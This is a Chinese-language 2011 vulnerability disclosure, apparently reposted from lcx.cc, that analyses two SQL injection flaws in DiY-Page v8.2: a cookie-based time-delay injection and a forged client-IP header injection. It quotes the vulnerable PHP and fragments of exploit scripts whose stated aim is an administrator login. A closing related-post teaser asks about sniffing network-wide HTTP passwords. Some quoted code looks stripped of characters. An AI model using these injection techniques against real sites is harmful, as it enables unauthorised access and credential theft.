漏洞名称:Diy-Page v8.2 站群系统两个注入漏洞分析
发布作者:子仪
发布日期:2011-2-2
影响版本:v8.2
程序介绍:
DiY-Page 创始于2005年2月末,是一个全新概念的自定制门户系统,使用它,可以轻松地将论坛变成一个准门户站点。最初它是由软件作者网站上自创的首页程序改进而成,经过不断的升级改进,软件程序的功能愈加完善,性能不断提高,深受广大网民喜爱......
第一个漏洞:Cookie 延迟注入
存在位置:/mod/dpcms/js/buymanage.php: include_once PATH_PRE.'lang/'.LANGPAK.'/fore.php';include_once PATH_PRE.'lang/'.LANGPAK.'/dpcms_fore.php';echo $uid=$_COOKIE['dp_uid'];$eid=intval($_GET['eid']);$dateformat= $d_mainset['mod_setting']['dpcms']['dateformat'] ? $d_mainset['mod_setting']['dpcms']['dateformat'] : 'Y-n-j H:i:s';$islog=$db->result($db->query('SELECT count(*) FROM '.DP_DBPREFIX.'user_list WHERE uid='.$uid.' AND password="'.$_COOKIE['dp_password'].'"')); |
$_COOKIE['dp_uid'],没有经过过滤就带入查询了,导致注入产生,由于没有回显,只能延迟注入。
第二个漏洞:Getip 注入
存在位置:/inc/func.php: if (getenv('HTTP_CLIENT_IP') and strcasecmp(getenv('HTTP_CLIENT_IP'),'unknown')) { $onlineip=getenv('HTTP_CLIENT_IP'); }elseif (getenv('HTTP_X_FORWARDED_FOR') and strcasecmp(getenv('HTTP_X_FORWARDED_FOR'),'unknown')) { $onlineip=getenv('HTTP_X_FORWARDED_FOR'); }elseif (getenv('REMOTE_ADDR') and strcasecmp(getenv('REMOTE_ADDR'),'unknown')) { $onlineip=getenv('REMOTE_ADDR'); }elseif (isset($_SERVER['REMOTE_ADDR']) and $_SERVER['REMOTE_ADDR'] and strcasecmp($_SERVER['REMOTE_ADDR'],'unknown')) { $onlineip=$_SERVER['REMOTE_ADDR']; } return preg_replace("/^([d.]+).*/","1",$onlineip); |
重点看最后一句:preg_replace("/^([d.]+).*/","1",$onlineip);作者的意图是将IP后面多余字符去掉,替换以数字+点开头的字符串,过滤非法IP,如1.1.1.1abcdef替换成1.1.1.1。但是这个正则有缺陷,只要不是数字开头,那就不进行替换。漏洞产生。
EXP,延迟注入:
/** if(isset($_GET['host'])&&isset($_GET['path'])){ //MD5的ASC码密码表 //获取当前时间
function send(){ fputs($fp, $data); while ($fp && !feof($fp)) //破解下一个 ?> diy-page v8.2延迟注入EXP 注:此EXP的成功率与实际网络状况有关。如何提高延迟注入成功率? |
getip() EXP:
/** function send() $cmd = "dpusername={$dpusername}&dpuserpassword={$dpuserpassword}&dpseccode={$dpseccode}&issubmit=1"; $fp = fsockopen($host, 80); $resp = ''; while ($fp && !feof($fp)) echo $resp; ?> 如果显示成功登陆,则表示提权成功。去管理员后台登陆即可。
|
文章来源于lcx.cc:【0day】Diy-Page v8.2 站群两个注入漏洞
相关推荐: 已获得网络出口引擎管理员权限,试问监控全网HTTP密码传输可能性?
【求解】已获得网络出口引擎管理员权限,试问监控全网HTTP密码传输可能性? 光的圆周率 (等级:二逼白帽子) | 2014-02-09 15:51 RT,获取了某大型局域网的网络出口引擎权限,采用锐捷RG-NPE50E网络出口引擎,引擎工作模式为网关 求问可否…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论